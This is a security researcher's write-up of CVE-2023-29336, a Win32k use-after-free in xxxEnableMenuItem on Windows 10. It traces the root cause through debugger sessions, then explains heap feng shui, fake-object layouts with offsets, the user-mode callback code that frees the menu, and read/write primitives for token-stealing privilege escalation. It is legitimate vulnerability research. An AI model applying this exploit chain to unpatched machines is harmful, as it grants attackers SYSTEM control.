Win32k that we lost. In details writeup about CVE-2023-29336

Posted on Mar 28, 2025

Introduction

Originally this article had been written almost two years ago and now I finally found some time to translate it and publish properly. Enjoy this story of exploiting Win32k at a time when it still didn’t have a garbage collector — and who knows, maybe by the time you’re reading this, Win32k has finally been rewritten in Rust. This exploit wouldn’t be possible without the article by NumenCyber, which provided key insights into the menu layout needed to build a reliable trigger. All expirements are made at pretty old Windows 10 1607 build 10.0.14393.5850 amd64.

Patchdiff

Files for patch diffing I took from WinBinIndex. The following table shows what we actually going to compare.

Filename	Hash	Version
win32kfull.sys	827B4223666871A7FE7274F97EECB74AFB380E41	Win10-1607-x8664 (April 2023)
win32kbase.sys	8FFEF7F7E2BFB01619E58CD52486283316AA3E7A	Win10-1607-x8664 (April 2023)
win32k.sys	23F88CD6E2541CB54D77809B840F41532E3277B3	Win10-1607-x8664 (April 2023)
win32kfull.sys	DF3D021A84B13A74182C993E982E27B16C38F9C1	Win10-1607-x8664 (May 2023)

Result of comparasion provided by BinDiff for win32kfull is quite clear. Only one function had been changed.

BinDiff results of comparasion

Root Cause Analysis

Vulnerable function is xxxEnableMenuItem. Inside that function there is a callback which issued without taking a reference to an object of type tagMENU returned by MenuItemState function. That allows an attacker reach an Use-After-Free condition.

Decompiled text of xxxEnableMenuItem before patch and after

But before we dive into deep technical stuff let’s discuss the callbacks problem in general. Callback functions are a common programming pattern that allow extensibility by letting user-defined functions execute at specific extension points in a general algorithm (or main logic). It’s specific functions that is kind of injected by user into extension points of main logic where some useful user stuff can be implemented. However, this pattern introduces challenges, especially around trust and ownership of shared resources — both before the callback is invoked and after control returns to the main execution flow. These challenges become even more complex when callbacks cross trust boundaries — such as transitions between kernel and user mode, or across a network.

How callbacks work

There are several ways to mitigate these risks: creating a separate copy of the state to pass into the callback (and avoiding reuse in the main logic), using reference counting, resource locking, and more. Each method has its trade-offs in terms of complexity, performance, and safety.

In this case the tagMENU type supports reference counting. Reference counting is a mechanism that prevents an object instance from being released while it is still in use — as long as some code holds a reference to it. The idea is simple: whenever code begins any work with protected object it must increment reference counter; when it is done, it decrements it. The crucial point is that the reference count must stay consistent throughout the object’s entire lifecycle. If the counter gets out of sync, reference counting provides no protection at all.

The main drawback is obvious: if a programmer forgets to increment the reference counter before using the object, then — from the system’s perspective — that code never actually used the object.

When callbacks are involved, this opens up a dangerous scenario. For example, the callback can release the object, then fill the freed memory with a completely unrelated object — all before the original function resumes execution. When the flow returns to the main logic and touches the original pointer again… 💥

That’s a Use-After-Free textbook.

meme

Now you might ask: where is the callback in xxxEnableMenuItem. Right before the spot where the reference counter increment was added. See it now? If not, no worries — I have prepared a quick clarification.

Internally, Microsoft uses specific naming prefixes for their functions, and these often carry special meaning. Most of the time, the prefix reflects the subsystem the function belongs to. But there are other conventions too. One particularly important prefix is xxx, which typically indicates that somewhere inside that function, there is a callback into user mode.

So yes — there is a callback happening inside xxxEnableMenuItem, and the absence of a proper reference count before it is the core of this bug.

That wraps up the root cause of the vulnerability. Now, let’s move on to the exploitation process.

Trigger

First, let’s figure out what the tagMENU structure is and what the MenuItemState function does. And after find out how to reach the usermode and setup everything to vullnerability trigger.

What is tagMENU?

tagMENU is an internal structure used by Windows to implement Menu UI. Unfortunately, its memory layout is not officially documented. However, we can find clues from resources like ReactOS and the leaked source code of Windows XP.

After reverse-engineering the actual layout of tagMENU on Windows 10.0.14393.5850 amd64, here’s what it looks like:

struct MyTagMenu_Win10x64_98h
{
    MyHead_win10x64 head;       // 00000000
    MyProcDeskHead  deskhead;   // 0000000C
    __int32         fFlags;     // 00000028
    __int8          gap1[4];    // 0000002C
    __int32         cAllocated; // 00000030
    __int32         cItems;     // 00000034
    __int32         cxMenu;     // 00000038
    __int32         cyMenu;     // 0000003C
    __int8          gap2[8];    // 00000040

    MyTagWnd_win10x64_168h *wnd;     // 00000048
    MyTagItem_Win10x64_98h *rgItems; // 00000050

    __int64 pParentMenusList; // 00000058
    __int32 dwContextHelpID;  // 00000060
    __int32 field_64;         // 00000064
    __int64 dwMenuData;       // 00000068
    __int8 gap3[20];          // 00000070
    __int64 field_84;         // 00000084
    __int64 field_8C;         // 0000008C
    __int32 field_94;         // 00000094
};

What does MenuItemState do?

The MenuItemState function is responsible for locating a specific menu item, typically by its uID. Internally, it uses a recursive helper function called MNLookupItem, which performs the actual lookup.

Here’s a snippet of the MNLookupItem implementation:

MNLookupItem implemetation

Reaching the UserMode

As mentioned earlier, xxxRedrawTitle contains callback to usermode. But to reach that point, several checks in xxxEnableMenuItem must first be satisfied.

The first check is that the menu (passed as the first argument to MenuItemState) must be a system menu. A system menu is retrieved via the API GetSystemMenu.

The second check is whether the menu item identifier which is returned in v15 variable matches one of the system-reserved IDs. These identifiers are typically occupied by default entries in the system menu (like “Restore”, “Move”, “Size”, etc.).

Here’s the trick: there’s no restriction on deleting default menu items. That means we can remove a default menu item and insert our own custom-controlled menu item, placing it wherever we want in the menu tree.

Checks in xxxEnableMenuItem

Now, gathering all prerequisites, we should create the following menu layout:

Menu layout

Why is MenuA the UAF target?

You might be asking: Why is MenuA chosen as the Use-After-Free target?

Let’s look back at the patched code and the implementation of MNLookupItem. The v15 variable holds a pointer to the submenu that contains the menu item with a reserved system ID. That’s why MenuA is the one — it’s the submenu directly referenced by v15.

And here’s the key issue:

MenuA doesn’t have its reference count incremented before the callback is invoked.

Usermode Callback in xxxRedrawTitle

Now let’s look at xxxRedrawTitle. There are three different code paths in this function that allow execution to cross into user mode:

Going down the rabbit hole through xxxDrawCaptionBar
xxxCallHook which invokes user-mode hooks. That hooks are set through API SetWindowsHookExA
xxSendMessage which is the simplest and most direct path — and the one I used.

xxxRedrawTitle

To receive the WM_NCUAHDRAWCAPTION message, we need to create a custom WndProc for the window that owns the menu targeted for UAF. That message will be dispatched to the window procedure during the redraw, allowing us to execute code in the callback — and destroy the menu at exactly the right moment.

The code that releases the menu can be seen in the snippet below:

LRESULT CALLBACK wndproc(HWND hWnd, UINT msg, WPARAM wParam, LPARAM lParam)
{
    switch(msg) {
        case WM_NCUAHDRAWCAPTION: {
            
            wprintf(L"[?] wndproc: msg=WM_NCUAHDRAWCAPTION wParam=%x lParam=%x\n", wParam, lParam);

            for (int i = GetMenuItemCount(g_hMenu_Top) - 1; i >= 0; i--) {
                RemoveMenu(g_hMenu_Top, i, MF_BYPOSITION);
            }
            wprintf(L"[+] 5. Destroy Menu\n");
            system("pause");

            DestroyMenu(g_hPopupMenu_A); // Here MenuA will be freed
            
            ...

            break;
        }
    }

    return DefWindowProc(hWnd, msg, wParam, lParam);
}

Debugging

Our debugging target is the My PoC of Exploit available on GitHub.

Let’s start by finding the address of the PoC process and switching context into it:

kd> !process 0 0 poc.exe
PROCESS ffffcc0e6b8f6800 <--> EPROCESS
    SessionId: 1  Cid: 0c30    Peb: 5858bd5000  ParentCid: 014c
    DirBase: 2cf00000  ObjectTable: ffff94044295ad80  HandleCount: <Data Not Accessible>
    Image: poc.exe

kd> .process /i /r ffffcc0e6b8f6800
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
kd> g

Because Win32k is not mapped into the system process, we need to run the commands above to switch into the correct session context. Win32k is only mapped into processes that deal with GUI. More details about what’s mapped inside system process can be found in this classic Microsoft article.

Once context is switched, it’s a good idea to reload symbols:

kd> .reload

Set a breakpoint on win32kfull!xxxEnableMenuItem and continue execution:

kd> bp /p ffffc70664bac680 win32kfull!xxxEnableMenuItem
kd> g

Once the breakpoint hits, step through until you reach the call to win32kfull!MenuItemState function. The last argument will contain a pointer to the MenuA instance — the target of our UAF.

kd> p
rax=ffffa0817b949ab0 rbx=fffffa8ac064c6b0 rcx=fffffa8ac064c6b0
rdx=000000000000f010 rsi=0000000000000002 rdi=000000000000f010
rip=fffffac7010196ae rsp=ffffa0817b949a50 rbp=ffffa0817b949b80
 r8=0000000000000002  r9=0000000000000003 r10=fffffa8ac1b5b870
r11=ffffa0817b949aa8 r12=00000000000204b6 r13=00000000000104ab
r14=0000000000000020 r15=fffffa8ac0629770
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
win32kfull!xxxEnableMenuItem+0x2a:
fffffac7`010196ae e801010000      call    win32kfull!MenuItemState (fffffac7`010197b4)
kd> ? poi(r11-0x38)
Evaluate expression: -104996992148816 = ffffa081`7b949ab0
kd> dq ffffde00877b0ab0 L1
ffffde00`877b0ab0  00000000`000104af <---> Uninitialized value
kd> p
rax=0000000000000000 rbx=ffffd7d74062a5f0 rcx=0000000000000002
rdx=000000000000f010 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac796b3 rsp=ffffde00877b0a50 rbp=ffffde00877b0b80
 r8=0000000000000000  r9=ffffde00877b0ab0 r10=ffffd7d74062e890
r11=0000000000000003 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0         nv up ei ng nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
win32kfull!xxxEnableMenuItem+0x2f:
ffffd7aa`3ac796b3 f7432800010000  test    dword ptr [rbx+28h],100h ds:002b:ffffd7d7`4062a618=04000101
kd> dq ffffde00877b0ab0 L1
ffffde00`877b0ab0  ffffd7d7`4062cfe0
kd> db ffffd7d7`4062cfe0
                                           \/
ffffd7d7`4062cfe0  73 00 03 00 00 00 00 00-01 00 00 00 00 00 00 00  s...............
ffffd7d7`4062cff0  00 00 00 00 00 00 00 00-70 1d 45 64 06 c7 ff ff  ........p.Ed....
ffffd7d7`4062d000  e0 cf 62 40 d7 d7 ff ff-01 00 00 00 00 00 00 00  ..b@............
ffffd7d7`4062d010  08 00 00 00 02 00 00 00-00 00 00 00 00 00 00 00  ................
ffffd7d7`4062d020  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
ffffd7d7`4062d030  00 e8 62 40 d7 d7 ff ff-50 2d 60 40 d7 d7 ff ff  ..b@....P-`@....
ffffd7d7`4062d040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
ffffd7d7`4062d050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

In the memory dump above, we can see the reference counter associated with the MenuA object. It’s stored at offset +0x08 from the beginning of the object. The value is currently 1, and we know this value won’t be incremented — meaning the object is vulnerable to being freed while still in use.

Continue stepping until we reach the call to win32kfull!xxxRedrawTitle function. The PoC has already set up all the required conditions — nothing too tricky, just basic Windows API usage.

kd> p
rax=ffffa0817b949a80 rbx=fffffa8ac064c6b0 rcx=fffffa8ac064c4a0
rdx=0000000000001000 rsi=0000000000000002 rdi=000000000000f010
rip=fffffac701019758 rsp=ffffa0817b949a50 rbp=0000000000000000
 r8=0000000000000000  r9=ffffa0817b949ab0 r10=fffffa8ac06299a0
r11=0000000000000003 r12=00000000000204b6 r13=00000000000104ab
r14=0000000000000020 r15=fffffa8ac0629770
iopl=0         nv up ei pl nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
win32kfull!xxxEnableMenuItem+0xd4:
fffffac7`01019758 e853e30000      call    win32kfull!xxxRedrawTitle (fffffac7`01027ab0)

Set a hardware breakpoint right after the call, and another one at win32kfull!DestroyMenu, where the MenuA will be freed:

kd> ba e 1 ffffd7aa`3ac7975d
kd> bp /p ffffc70664bac680 win32kfull!DestroyMenu
kd> g

Once the callback hits and attempts to release the menu, win32kfull!DestroyMenu will trigger breakpoint.

kd> g
Breakpoint 2 hit
rax=0000000000000001 rbx=0000000000000000 rcx=ffffd7d74062cfe0
rdx=0000000000000001 rsi=0000000000000000 rdi=0000000000000020
rip=ffffd7aa3ac96d20 rsp=ffffde008616de08 rbp=ffffde008616dec0
 r8=0000000000000002  r9=0000000000000040 r10=ffffd7d743d997c0
r11=ffffd7d743d997c0 r12=00000000000204d0 r13=00000000000000ae
r14=00000000000204d0 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
win32kfull!DestroyMenu:
ffffd7aa`3ac96d20 48895c2410      mov     qword ptr [rsp+10h],rbx ss:0018:ffffde00`8616de18=0000000000000000

Step through until you reach win32kbase!HMFreeObject, where RCX still points to MenuA.

rax=0000000000000000 rbx=ffffd7d74062cfe0 rcx=ffffd7d74062cfe0 <------- MenuA
rdx=0000000000000000 rsi=ffffd7d74062e920 rdi=0000000000000000
rip=ffffd7aa3aa3ee20 rsp=ffffde008616ddd8 rbp=ffffde008616dec0
 r8=0000000000000080  r9=0000000000000001 r10=0000000000000003
r11=0000000000000001 r12=00000000000204d0 r13=00000000000000ae
r14=00000000000204d0 r15=0000000000000000
iopl=0         nv up ei ng nz na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000286
win32kbase!HMFreeObject:
ffffd7aa`3aa3ee20 48895c2410      mov     qword ptr [rsp+10h],rbx ss:0018:ffffde00`8616dde8=ffffd7d74062e920

A bit further in, you’ll hit nt!RtlFreeHeap, which actually frees the memory. R8 holds the base address of the freed memory block:

rax=ffffd7d743d99701 rbx=ffffd7d740400ac8 rcx=ffffd7d740600000
rdx=0000000000000000 rsi=0000000000000000 rdi=ffffd7d74062cfe0
rip=ffffd7aa3aa3ef82 rsp=ffffde008616dda0 rbp=ffffde008616de12
 r8=ffffd7d74062cfe0  r9=0000000000000001 r10=0000000000000003
r11=0000000000000001 r12=00000000000204d0 r13=00000000000000ae
r14=0000000000000001 r15=0000000000000000
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
win32kbase!HMFreeObject+0x162:
ffffd7aa`3aa3ef82 ff1500820f00    call    qword ptr [win32kbase!_imp_RtlFreeHeap (ffffd7aa`3ab37188)] ds:002b:ffffd7aa`3ab37188={nt!RtlFreeHeap (fffff803`4683bfd4)}

Now continue execution until the post-callback hardware breakpoint hits — we’re back inside win32kfull!xxxEnableMenuItem, but MenuA is already freed.

kd> g
Breakpoint 1 hit
rax=0000000000000001 rbx=ffffd7d74062a5f0 rcx=ffffd7d74062a3e0
rdx=ffffd7d740600820 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac7975d rsp=ffffde00877b0a50 rbp=0000000000000000
 r8=ffffd7d740600700  r9=ffffc70664451d70 r10=000000032ca29f71
r11=ffffde00877b0640 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0         nv up ei ng nz na pe nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000282
win32kfull!xxxEnableMenuItem+0xd9:
ffffd7aa`3ac7975d 81ff60f00000    cmp     edi,0F060h

After the previously set breakpoint is hit, let’s continue stepping through the code until we reach the call to win32kfull!MNGetPopupFromMenu function.

kd> p
rax=ffffd7d74062a3e0 rbx=ffffd7d74062a5f0 rcx=ffffd7d74062cfe0
rdx=0000000000000000 rsi=0000000000000002 rdi=000000000000f010
rip=ffffd7aa3ac796ca rsp=ffffde00877b0a50 rbp=0000000000000000
 r8=ffffd7d740600700  r9=ffffc70664451d70 r10=000000032ca29f71
r11=ffffde00877b0640 r12=00000000000204d0 r13=00000000000104af
r14=0000000000000020 r15=ffffd7d74062cfe0
iopl=0         nv up ei pl zr na po nc
cs=0010  ss=0018  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
win32kfull!xxxEnableMenuItem+0x46:
ffffd7aa`3ac796ca e835e20100      call    win32kfull!MNGetPopupFromMenu (ffffd7aa`3ac97904)

The RCX register contains the same pointer we observed earlier, right after the call to win32kfull!MenuItemState. Let’s dump the contents of that object again — this time, we’ll see that the memory has changed.

kd> db ffffd7d74062cfe0
ffffd7d7`4062cfe0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
ffffd7d7`4062cff0  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
ffffd7d7`4062d000  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
ffffd7d7`4062d010  41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
ffffd7d7`4062d020  41 41 41 41 41 41 40 30-30 30 30 00 00 00 00 00  AAAAAA@0000.....
ffffd7d7`4062d030  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
ffffd7d7`4062d040  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................
ffffd7d7`4062d050  00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  ................

So how did that happen? Our callback didn’t just release the memory — it reclaimed it with controlled data.

Let’s dive into the next question: How do we replace a freed kernel object in memory with controlled data?

Exploit

Heap feng shui

Before diving into the heap feng shui used in this exploit, let’s first revisit some core concepts at a high level.

In Win32k, most GUI-related objects are associated with a specific Desktop These objects are allocated from a Desktop Heap, which is created during desktop initialization. This heap is managed by nt implementation (RtlpAllocateHeap/RtlpFreeHeap). We can roughly imagine the desktop heap as a sorted (asc order) list of free memory chunks. Each chunk is a fixed-size virtual memory block. When an allocation is made, a chunk is taken from the list; when it’s freed, the chunk is returned to the list. Key Details of the Allocator:

RtlpAllocateHeap
- Aligns the requested size to a 16-byte boundary
- Searches for the first chunk in the free list that is large enough
- If the found chunk is larger than needed, it’s split into two. The left part is returned to the caller. The right part is reinserted into the free list
RtlpFreeHeap
- Marks the chunk as freed
- If adjacent chunks (left/right) are also free, they may be coalesced into a single larger chunk

From this behavior, a simple conclusion emerges: Subsequent allocations and deallocations of the same size will almost always reuse the same memory chunk.

This reuse behavior is critical to reliably reclaiming freed objects — and forms the basis of our exploitation strategy.

⚠️ Warning
Obviously, this is an oversimplification. There are many allocator behaviors that may matter in other cases — like LFH (Low Fragmentation Heap), chunk header encoding, randomized selection, etc. But for clarity, I’ve intentionally kept this section simple as much as possible

Before we can act, we need a plan:

Prepare the Desktop Heap, specifically the list of free chunks.We want this list to start with chunks located at controlled or predictable addresses, and with sizes as close as possible to the size of the target object. We’ll refer to these candidate chunks as “seats”.
Allocate the target object in one of those prepared seats. Roughly speaking, we want to “seat” the object into the right place.
Free the target object, creating a hole at a known location.
Reallocate all “seats” with controlled objects to replace the freed object.

Now we have a plan and we are ready to discuss each step in detail.

Heap preparation usually consists of two steps: Heap Normalization and Freeing Selected Chunks.

Allocate a large number of memory chunks to normalize the heap layout. The goal is to make subsequent allocations more predictable — or even strictly sequential.
Allocate another batch of chunks and selectively free some of them using appropriate APIs. Most of the time, we want to avoid freeing adjacent chunks to prevent coalescing. We’re aiming to create isolated free chunks — “the seats” — that will later be used to reclaim the target object.

Before we can prepare any seats, we obviously need to allocate something first. But to do that, we need to answer an important question: What size should our seats be?

Because the heap allocator (RtlpAllocateHeap) selects the smallest free chunk that fits the aligned allocation size. So the closer our seat size is to the size of the target object, the higher the chance that chunk will be reused during reallocation. The ideal case, of course, is when the seat size is exactly equal to the aligned size of the target object.

Here it is good spot to compute actuall size of tagMENU chunk. Size of struct if 0x98 but RtlpAllocateHeap will align it to 0xA0.

Just as a refresher, here’s the typical alignment formula: (size_t)((~(n - 1)) & ((x) + (n - 1)))

Since there’s no direct way to allocate arbitrary chunks in the Desktop Heap, we need to use APIs that internally allocate Win32k objects on that heap. Our goal is to either: Use an object whose size we can control, or choose an object whose size closely matches the size of the target (tagMENU). Fortunately, Win32k (along with usermode Win32 APIs) offers plenty of options. Many exposed APIs lead to object creation in the Desktop Heap

CreateWindow → allocates a tagWND
CreateMenu → allocates a tagMENU
CreateAcceleratorTable → allocates a tagACCELTABLE
…

To make holes for the target tagMENU object, we’ll use an object allocated by the RegisterClassExW API — which creates a tagCLS structure.

This object is especially useful because we can control its size. By carefully adjusting fields in the WNDCLASSEXW structure — particularly cbClsExtra — we can fine-tune the layout of the resulting tagCLS object, making it a perfect fit for the freed chunk of tagMENU.

On the tested version of Windows (10.0.14393.5850), the size of a tagCLS object with cbClsExtra == 0 is A0h, which alomst perfectly matches the size of the tagMENU structure.

However, there’s an important detail about how tagCLS objects are created: Every tagCLS must have a name, specified in the lpszClassName field of the WNDCLASSEXW structure — and that name must be unique.

This name string is also allocated in the same Desktop Heap. As a result, the tagCLS and its name may be allocated in adjacent chunks. When the tagCLS is freed, its associated name is also freed, and the allocator coalesces the two chunks into one larger free block.

This can be a problem: the resulting free chunk might no longer be A0h or B0h, but something larger like D0h or more. That breaks our assumption that the seat will perfectly match the target object’s size — and even small gaps can ruin the exploit.

💥 In practice, this behavior caused occasionally crashes during exploitation.

Fortunately, spraying a large number of allocations helps mitigate the issue by saturating the heap and improving the odds of perfect fits. But it doesn’t eliminate the problem completely.

Problematic heap feng shui

On the picture below you can see corresponded situation but from freelist point of view.

Dump of free list

Now is a good time to highlight the code that actually allocates objects and creates the holes.

This part of the exploit relies on the assumption that the Desktop Heap has already been normalized, meaning that new allocations will be placed into adjacent chunks within the Desktop Heap. That gives us the predictability we need to ensure our freed object — the hole — is exactly where we want it.

Seats preparation

Let’s move on to the next major step. How to fill the freed hole with a new tagMENU object. Strictly speaking, this part isn’t very difficult. Once again, we’ll rely on Win32k APIs — in this case, we’ll use the CreatePopupMenu function.

But as with the tagCLS case, there’s a subtle detail worth pointing out.

A tagMENU object may contain menu items, and memory for those items must be allocated. As you might guess, this memory is allocated on the same Desktop Heap as the tagMENU itself.

On the picture below, you can see how item allocation happens internally:

Allocating memory for tagMENU items

In the picture below, you can see the memory layout after CreatePopupMenu — specifically, where the menu items are allocated:

Allocating memory for tagMENU items as memory layout

Because the holes we created earlier were isolated from surrounding chunks, the tagMENU object itself will be allocated directly into one of those holes. However, the memory for the menu items (rgItems) will be allocated elsewhere — likely in a different free chunk on the Desktop Heap.

This separation is important. It means the menu object lands where we want (replacing the freed target), while its internal data structures won’t intersect with neighboring memory — preserving the integrity of the surrounding heap and improving exploit reliability.

After the trigger (which we’ve already discussed), the vulnerable tagMENU object gets freed. Now it’s time to reclaim that freed memory with something else — something fully under our control.

But what kind of object should we use to replace tagMENU?

We’ll go back to using a familiar structure: tagCLS. However, this time we won’t use the tagCLS structure itself — instead, we’ll target the class name field, lpszAnsiClassName.

As mentioned earlier, this string is allocated on the same Desktop Heap, and unlike the structure itself, we can control every byte at any offset. That makes it a perfect candidate for crafting a fake object layout.

💡 The reason we don’t use the full tagCLS structure here is because we can’t directly control its lower offsets — at least not easily. (Think of APIs like SetClassLongPtr. Spoiler: we’ll use that trick later.)

Let’s summarize everything about the replacement strategy.

To reclaim the freed tagMENU chunk, we need to create a string of exactly 98h bytes, matching the size of the tagMENU. This string must also be unique to satisfy the Win32k requirement that each tagCLS name be unique.

We then use that string as the lpszAnsiClassName field when registering a new tagCLS via RegisterClassExW.

There’s one more subtlety here: Because the tagCLS structure itself is very similar in size to tagMENU, we need to ensure that it doesn’t accidentally land in the freed chunk. So to avoid conflicts and ensure the name string lands there instead, we increase the size of the tagCLS using the cbClsExtra field of the WNDCLASSEX structure.

💡 You might ask — why use lpszAnsiClassName instead of other strings in WNDCLASSEX? For example, lpszMenuName looks controllable too. But here’s the catch: that string isn’t allocated on the Desktop Heap. Instead, it’s allocated using ExAllocatePoolWithQuotaTag, which puts it in pool memory — not what we want.

In the image below, you can see the result — all previously holes and freed tagMENU have been successfully reclaimed with controlled lpszAnsiClassName strings from different tagCLS instances:

Memory layout when tagCLS.lpszAnsiClassName replaced MenuA

In the image below, you can see the code responsible for reclaiming the freed tagMENU chunk with our controlled data.

tagMENU replacement

And here’s the result.

The memory dump below shows the reclaimed object sitting exactly where tagMENU was previously located. You might recognize this from the debugging section near the beginning of the write-up — it’s the similar overwritten memory dump we saw after the user-mode callback triggered the free:

tagMENU memory dump when object is replaced

That wraps up everything related to heap feng shui and precise memory layout control.

R/W

The final goal of this exploit is to elevate privileges. There are several ways to achieve this, but in this write-up, we’ll use one of the classic techniques: Token Stealing. In simple terms, we want to replace the _TOKEN in the _EPROCESS structure of our current process with the System process (PID 4). This results in our process inheriting the full privileges of the System process.

Notice the semantic of the operation: it’s a replacement.

And replacement can be decomposed into two fundamental operations:

Read: read the _TOKEN pointer from the System _EPROCESS
Write: write that pointer into our own process’s _EPROCESS structure

In this section, we will construct the read and write primitives — the fundamental building blocks of our exploit.

Trick the system

To achieve write capabilities, we’ll once again rely on familiar Win32k objects: tagCLS and tagWND.

The tagCLS structure contains a particularly interesting field called cbClsExtra. This field defines how many extra bytes are reserved after the tagCLS object in memory. This extra space is intended to allow third-party applications to store custom data.

Windows exposes two APIs for accessing this area:

These functions allow user-mode applications to read from and write to the memory immediately following the tagCLS object — based on the value of cbClsExtra.

If we manage to manipulate cbClsExtra, we can trick the system into thinking there’s a large amount of extra memory after the object. From there, it’s straightforward to use SetClassLongPtr to perform out-of-bounds writes well beyond the original object boundary — giving us a powerful and flexible write primitive.

So how do we actually trigger the use of the freed object?

We use the vulnerable code as designed: after the execution flow returns from user-mode (where the object was freed and replaced), the kernel continues using the original pointer — now pointing to a fully controlled fake object.

This is the last crucial piece of the puzzle.

At the end of xxxEnableMenuItem, the (now stale) object is passed as an argument to the MNGetPopupFromMenu function. This function performs a search for a corresponding tagPOPUPMENU structure by walking two linked lists stored in the tagMENUSTATE (tagMENUSTATE is stored in UserThreadInfo. UserThreadInfo is reachable through the tagWND that is the parent of the target tagMENU). If the search succeeds, the function returns a pointer to a tagPOPUPMENU instance.

MNGetPopupFromMenu code

After returning from MNGetPopupFromMenu, the object it returns is passed back to xxxEnableMenuItem, and from there it is forwarded as the first argument to the function xxxMNUpdateShownMenu.

Inside xxxMNUpdateShownMenu, only two fields of the returned object are accessed:

spwndPopupMenu
spmenu

Both are read-only at this stage. The spwndPopupMenu field is passed down to xxxScrollWindowEx and xxxInvalidateRect.

xxxScrollWindowEx doesn’t modify anything in spwndPopupMenu, and it eventually reaches the same sink as xxxInvalidateRect: a call to xxxRedrawWindow.

And now comes the crucial part.

Inside xxxRedrawWindow, the spwndPopupMenu object is used on write. A bitwise OR operation with the constant 02h is performed at offset +0x120 into the structure.

Here is the relevant disassembly:

Assembly code of write operation

And the corresponding pseudocode:

Pseudo code of write operation

This gives us exactly what we need.

By crafting the fake object such that the spwndPopupMenu field points to the cbClsExtra field in our target tagCLS structure, we can cause the system to OR that value with 02h. The result cbClsExtra becomes larger than it originally was.

And that gives us what we want — the ability to use SetClassLongPtr to write well beyond the original bounds of the tagCLS structure, turning it into a write primitive. It’s not yet a fully arbitrary write — but we’ll address that in the next step.

To set the field_120 pointer (used in the write operation) to point to the cbClsExtra field in our fake tagCLS object, we first need to know its kernel address. Without it, we can’t correctly position the write or extend our primitive.

To solve this, we’ll use a well-known but effective technique based on the internal Win32k function HMValidateHandle.

Now it’s time to turn our relative write primitive into a fully arbitrary write.

To do this, we want to create a specific memory layout on the Desktop Heap:

A tagCLS object (we’ll call it the Manager) placed between two tagWND objects
The left tagWND becomes our LeftGuard
The right tagWND becomes our RightGuard

In order to achieve that we will do the follwing things.

Create a tagCLS that we’ll use to create tagWND objects. We’ll refer to this class as GuardClass.
Allocate 256 tagWND objects using CreateWindowEx and the GuardClass. These windows will populate the heap and help us find sequential placements.
Find three tagWND objects that are allocated sequentially in memory. To verify whether they occupy adjacent memory chunks, we use the HMValidateHandle technique. This allows us to leak the kernel addresses of the tagWND instances and check if they are placed contiguously in the Desktop Heap.
- The first will become the LeftGuard
- The third will become the RightGuard
- The second one is freed using DestroyWindow — creating a hole
Create a new tagCLS, with a size equal to that of the previously released tagWND. This new class will be allocated into the hole, and becomes our Manager.
Release all unused tagWND windows from step 2, keeping only the LeftGuard and RightGuard.
Create a new tagWND using the class associated with the Manager. This new window gives us a handle we can use with SetClassLongPtr, tied to the tagCLS in the middle. We’ll refer to this final window as WND Manager.

The tagWND size must be greater than 90h bytes (it may be achieved via cbwndExtra field of GuardClass). This is critical because we will later use this region to bypass some internal checks in Win32k when finalizing the write primitive.

Offset that we should pass to spwndPopupMenu is VA-of-Manager + 63h - 120h

60h because this is offset of cbClsExtra
03h because we want to modify the highest rank of stored dword
120h because it is offset to field_120

Now it’s time to prepare the fake object that will allow us to overwrite the cbWndExtra field in our Manager.

Pseudo code of write operation

The memory once occupied by the original tagMENU is now replaced with controlled data. We control this memory via the lpszAnsiClassName field of a tagCLS, as explained in the Heap Feng Shui section.

Now we are ready to move on and make final primitives.

Arbitary Read

We’ll start by implementing the read primitive, since it will be used later in our arbitrary write.

This primitive leverages the GetMenuBarInfo API in combination with our RightGuard window. When called with OBJID_MENU (value -3), GetMenuBarInfo retrieves information about the menu attached to a window (specifically a tagWND).

Internally, GetMenuBarInfo is backed by xxxGetMenuBarInfo and it reads from the rgItems field of the associated tagMENU object. The pointer to this tagMENU comes from the spmenu field inside tagWND.

xxxGetMenuBarInfo implementation

Because we already have a relative read/write via our Manager, we can modify the spmenu field in RightGuard to point to a fake tagMENU structure under our control. This allows us to trick GetMenuBarInfo into reading from an arbitrary address.

The implementation of this technique is shown in the image below.

Read64 implementation

Arbitary Write

To implement the arbitrary write, we use the same relative read/write primitive from the Manager to modify the pcls pointer in RightGuard, pointing it to a fake tagCLS under our control.

We then call SetClassLongPtr on RightGuard, which operates on this fake structure. Internally, Win32k uses the pclsClone field of tagCLS to compute the destination address.

SetClassLongPtr implementation

As seen in the pseudocode, the final write target should be VA-of-WriteTarget - A0h. A0h is the offset of _extra field. The write occurs in a loop, and the field at offset 00h (the next pointer) must be zero, or the loop will continue and likely cause a crash or corrupt other memory.

